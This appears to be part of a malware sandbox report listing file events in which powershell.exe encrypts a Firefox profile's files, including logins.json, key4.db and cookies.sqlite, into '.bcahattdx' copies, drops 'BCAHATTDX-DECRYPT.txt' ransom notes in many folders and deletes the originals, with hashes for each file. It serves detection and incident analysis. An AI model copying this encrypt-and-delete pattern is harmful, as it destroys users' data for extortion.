SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata.bcahattdx
binary
MD5: 0ffbb38e51f94543eb5e6e8975b3a73e
SHA256: 034cd7aa296a2ba0d55394722d80cf921e342fe8221ed878b341d6beda2824bb
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\journals\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.sqlite.bcahattdx
binary
MD5: f97718b2aed3eaa33895f2dc23d62aec
SHA256: 19af6c818e23bca93125789b093985e7ff939c1324757a5d0584c1c28e76a880
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\1
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\1.bcahattdx
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata-v2.bcahattdx
binary
MD5: 25e36a50c818015511864312fea0837e
SHA256: 3d8bf0a24166b9bbccb768945acccdf6c9a552509640c66c0f8103d9547fc736
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata-v2
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\SiteSecurityServiceState.txt.bcahattdx
binary
MD5: 777332f95560c56f7badcadf94b415da
SHA256: 24cfa636f6366c22d7e1b6f00407853af6294b88e6d8a09fe1ad36d67fb4e5cf
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata.bcahattdx
binary
MD5: 935848afeed6d9bd4ea82dc2bc4ef0d0
SHA256: 1cdde6642b12fc7189678b1044e9abc768a4d6f373548c3bdaaa3618e124ca54
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\previous.jsonlz4.bcahattdx
binary
MD5: da6b8419452a90efabe5dcd264856578
SHA256: 2c1c704907d15e37be6b27bc5edd52f3776f1f6f780bbdfc5408342fa886c58b
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore.jsonlz4.bcahattdx
binary
MD5: fa8f9fbaacd9d39898bc0f31e6248e7c
SHA256: a22bdc371f733f8e44db7642e951c920520bbbfbfb002ccbadf3ea16f3caa613
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\SiteSecurityServiceState.txt
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\previous.jsonlz4
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore.jsonlz4
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\revocations.txt.bcahattdx
binary
MD5: 72f877f95ef5d2eda00b802347b39199
SHA256: fc8b09866f6df614d534b3a752b5f9d80b67871432b153237dc84a09e0cb68f1
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json.bcahattdx
binary
MD5: d6851e7732c8db454afffa0621e2c180
SHA256: a5693eef62027ad229440c780a1f6f320b9e3f49ed5e40476e4db71593a4f9c1
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\search.json.mozlz4.bcahattdx
binary
MD5: 49c1d131f67f933b4a324d94cfe9d738
SHA256: 5cb81af962902de82d0651a2ffc23214839817705b0c4d8c4c23dac4958fc748
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\saved-telemetry-pings\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\search.json.mozlz4
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\revocations.txt
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pluginreg.dat.bcahattdx
binary
MD5: 3a6c7a07d629ade3b25c8a18d1c8189f
SHA256: b6112a7e8f7258cd2a1b3cb9827f2028a3e99bc005a53f51a720401d54989e9e
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.js.bcahattdx
binary
MD5: dc42b1fae590f9248e5a8950d4eb01e7
SHA256: de249d5f7fe75787c2d0d3bd082f4726feec7f524bc99616b2b5162021a54d0d
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pluginreg.dat
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.js
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\places.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\places.sqlite.bcahattdx
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\permissions.sqlite.bcahattdx
binary
MD5: a51acceb166d06141d52e93b03309bc6
SHA256: 5531c7564b3d56d0e598bdb31438b003bcf7891839585e7a2eecbb8dfb15656d
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\minidumps\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\logins.json.bcahattdx
binary
MD5: 7342c3d9d92f17f9c05cd9dbdfb7d647
SHA256: a92022a7e2d08b7d17b749deb484640e845086cd8cc4c35198e2ea9248d86e5b
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pkcs11.txt.bcahattdx
binary
MD5: dd9c68ca6893649f6eba8f6575e2f082
SHA256: df592386d8514b3fc102aa9f9ef84e3c50b51e4ebaa8c84b3e14951ff76ebd84
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pkcs11.txt
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\permissions.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\logins.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\key4.db.bcahattdx
binary
MD5: 7dfb39f78155e18ea6db1a12e6956780
SHA256: 9d22a2e58949ad17d6f0b91b604a574845b9b6027e28aa6a5379cbdcacbd6676
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\key4.db
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.sig.bcahattdx
gpg
MD5: 0dcbfaa24e987940acddb12d8fe07189
SHA256: 1918edf353285adbfa57c6f82c81a71b84f889c4ff4e158c657d5b29c24ee199
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\handlers.json.bcahattdx
binary
MD5: 68e2e25baec03f483417de1fa9800e43
SHA256: df73fa0d71c2483e4fd758334832cd4451059fa560ca08eebf485e2683a1f268
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\handlers.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.sig
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.lib.bcahattdx
binary
MD5: 4d8cb303f96b8c8e865d8311cb3705de
SHA256: ed7e4f9b4a9e2956e24098549a7087b7de880cdb511c09a3245a59d7b7c91db6
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\manifest.json.bcahattdx
binary
MD5: c413ebfb9a112f4d372108877e1fe4b4
SHA256: cb8e27b69a0baf43f2867341d9ffb36bee4e37e5a08fd98b29056ac8086adecd
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.lib
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\manifest.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-gmpopenh264\1.7.1\gmpopenh264.info.bcahattdx
binary
MD5: 377be4e579a73623dc293e77cf0e4204
SHA256: 87d3a3a696900d0db8a3b7dc40dca29f5985adc556af3915a3226b0823ee8ab0
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-gmpopenh264\1.7.1\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\LICENSE.txt.bcahattdx
binary
MD5: b7d08e75f1489938b2b785f41b58fc47
SHA256: 1299cb24882d4e35daeaab1867451d96df15889ae6e125a0802ad0c12470accb
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-gmpopenh264\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\LICENSE.txt
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-gmpopenh264\1.7.1\gmpopenh264.info
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\formhistory.sqlite.bcahattdx
binary
MD5: 9a1ba309f407fdf88275d49d0665d9ed
SHA256: 3e06d67ec9adf657f62a2440e3bc2fe5b4651a92c975166a8d63d585f48e3a34
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp\WINNT_x86-msvc\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\formhistory.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\favicons.sqlite.bcahattdx
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\favicons.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\session-state.json.bcahattdx
binary
MD5: 6f6bcbe2fd1545547a1eb43ec279e211
SHA256: 517a96314d7784f51e0d922109cb50ee89108dbc9808b39e4690bf8e9eb2ba8e
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536511076670.6fb1a61f-96c8-4004-a260-a8d32e45a07f.main.jsonlz4.bcahattdx
binary
MD5: a6a599cdf605808f959ff421672195a1
SHA256: a6a43dbed738d94e5fc727ff7994458eece943cc8ad891e9595da6d80145eb0a
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\extensions.json.bcahattdx
binary
MD5: 4f92ea66342bb53c210d19e68b48ac01
SHA256: f3d631076e87f10c4f90bbed7398d4b0e774ddc3cfdda506b64e32c50352bbf5
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\state.json.bcahattdx
binary
MD5: 68b2ea88244fd0543e83b35bc36ae019
SHA256: 76f6757a90d76abaafa155bafc5487a76dae84ca97bf019871eda33ea4284c12
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\session-state.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536511076670.6fb1a61f-96c8-4004-a260-a8d32e45a07f.main.jsonlz4
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\extensions.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\state.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536510464398.048632c6-c96b-486d-b119-7e1a7a9c9e9a.main.jsonlz4.bcahattdx
binary
MD5: 6ad7bbc45db0125a3990e743cb85b870
SHA256: 492472f6d14711c7b278f104ed0a89265af90e4fc429a5255d7c664f4d41d89a
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536510890757.0bd2c0b0-6051-4678-a27c-37f3c0a0c3bf.main.jsonlz4.bcahattdx
binary
MD5: a123693efef39caed43bcd7c57b46a8d
SHA256: 59a539472bb7d09376f655f87227fbd630cebf56c9f4d81af29714e1dd9c5488
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535455254239.6a6d1f6c-b378-42bd-83d4-6375a8d83c94.main.jsonlz4.bcahattdx
binary
MD5: 12d746ec7fee7452b2a7a2af71997e6f
SHA256: 8f1bcab7a1c04ff5a2ab692f043fa370e61a018aefab801fb33ad04dd18e94a3
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536510464398.048632c6-c96b-486d-b119-7e1a7a9c9e9a.main.jsonlz4
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536510890757.0bd2c0b0-6051-4678-a27c-37f3c0a0c3bf.main.jsonlz4
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535455254239.6a6d1f6c-b378-42bd-83d4-6375a8d83c94.main.jsonlz4
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589776.07f73e80-2b12-40ae-97b0-fa87f3167670.main.jsonlz4.bcahattdx
binary
MD5: ccbf13f0d2a6b3d7928627ed0f94d907
SHA256: cb2a5437987656c3c29afd37a31b8f82c52748b8430030bb83bedf94a0cb6e5e
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589752.05c13197-8f39-40a1-b976-59f6f9c1cc5f.new-profile.jsonlz4.bcahattdx
binary
MD5: a6bf8206a3f57f9b0800813bbf636b00
SHA256: d4b21438a1e19bf9eeea111ce30e0066009ca9c3bf29659011174186e53c9cbf
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589777.8901d324-d310-406e-8d96-2ba1529e4bea.first-shutdown.jsonlz4.bcahattdx
binary
MD5: 50637a9e816e137784600de59e23573d
SHA256: 9113f940aa04df412a3f850152d019340fbdbec762f3617ca7b384d4beaf4401
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589752.05c13197-8f39-40a1-b976-59f6f9c1cc5f.new-profile.jsonlz4
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589777.8901d324-d310-406e-8d96-2ba1529e4bea.first-shutdown.jsonlz4
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589776.07f73e80-2b12-40ae-97b0-fa87f3167670.main.jsonlz4
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\crashes\events\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454581431.ff499cec-8d4b-47de-a059-a9aea3d69a66.main.jsonlz4.bcahattdx
binary
MD5: c02376ddf45807246f0dd0a6711c2c65
SHA256: 3a6e8516ec3deba6934cbd0132c7948f7e62787c4ebd4ba0e7b36dbbc08b68b1
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\crashes\store.json.mozlz4.bcahattdx
binary
MD5: 341d09045a80a05e3f4d79e39f722ad2
SHA256: 2d399e0bc7bcbc8c339df810f135808a3b7baecb5c635898e2f297fcd175950c
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454581431.ff499cec-8d4b-47de-a059-a9aea3d69a66.main.jsonlz4
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\crashes\store.json.mozlz4
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\content-prefs.sqlite.bcahattdx
binary
MD5: 6c31ed6ed04cc01956be755f4792a710
SHA256: ee30c536046355b583b74e8f91f6df3256845e32746158d035e3dcab162eac3b
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite.bcahattdx
binary
MD5: 677353644a6bead3fd0b870fad20023b
SHA256: 23cdd0a4dc105326005f6dece34a14c43cf3fb46388bab2e39b222005f80a4f1
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\crashes\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\content-prefs.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cert9.db.bcahattdx
binary
MD5: 24895d165b36ece5e93b44dd9d92620b
SHA256: 7c3036af5bdf7627b9d27414db23a5ed7ec7225fb1e2c362081bc2c92fdf2d45
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\containers.json.bcahattdx
binary
MD5: 48d2bc591e109fa8bc28558d4590d999
SHA256: 4a6bd71b36a1458e20917f2209c5c2d9d506b3245c7d5be2d63acfc69b343a51
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\compatibility.ini.bcahattdx
flc
MD5: 5bcb1561691c03f96a7371931565fce5
SHA256: f4c5171e08a8c90b76bd5134ed27f8d7ee01b180623fcb9300f973dd03e6d7c7
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\containers.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\compatibility.ini
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cert9.db
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\plugins.json.bcahattdx
binary
MD5: 0da13ed256b045226ca3f49603c71639
SHA256: d8364cc104607f4223e87c457836f9358a1926f29aa5c0df70411711f00822b4
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\bookmarkbackups\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\addons.json.bcahattdx
binary
MD5: 36add815869596302201347185925b89
SHA256: a756ea9f258f7dc022f1a024228f93098ffdb189365795b1f072cb4b333f5d52
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\bookmarkbackups\bookmarks-2018-08-28_14_uZyx1cMFmZ7ZpL4NneCk2A==.jsonlz4.bcahattdx
binary
MD5: f0d3b010646a3cc9ebda0c9ddf0a7f7b
SHA256: e6783223a839ea4dcfa76c3b94c3273a4cd2c0bac8749477913022120d045887
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\bookmarkbackups\bookmarks-2018-08-28_14_uZyx1cMFmZ7ZpL4NneCk2A==.jsonlz4
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\plugins.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\addons.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
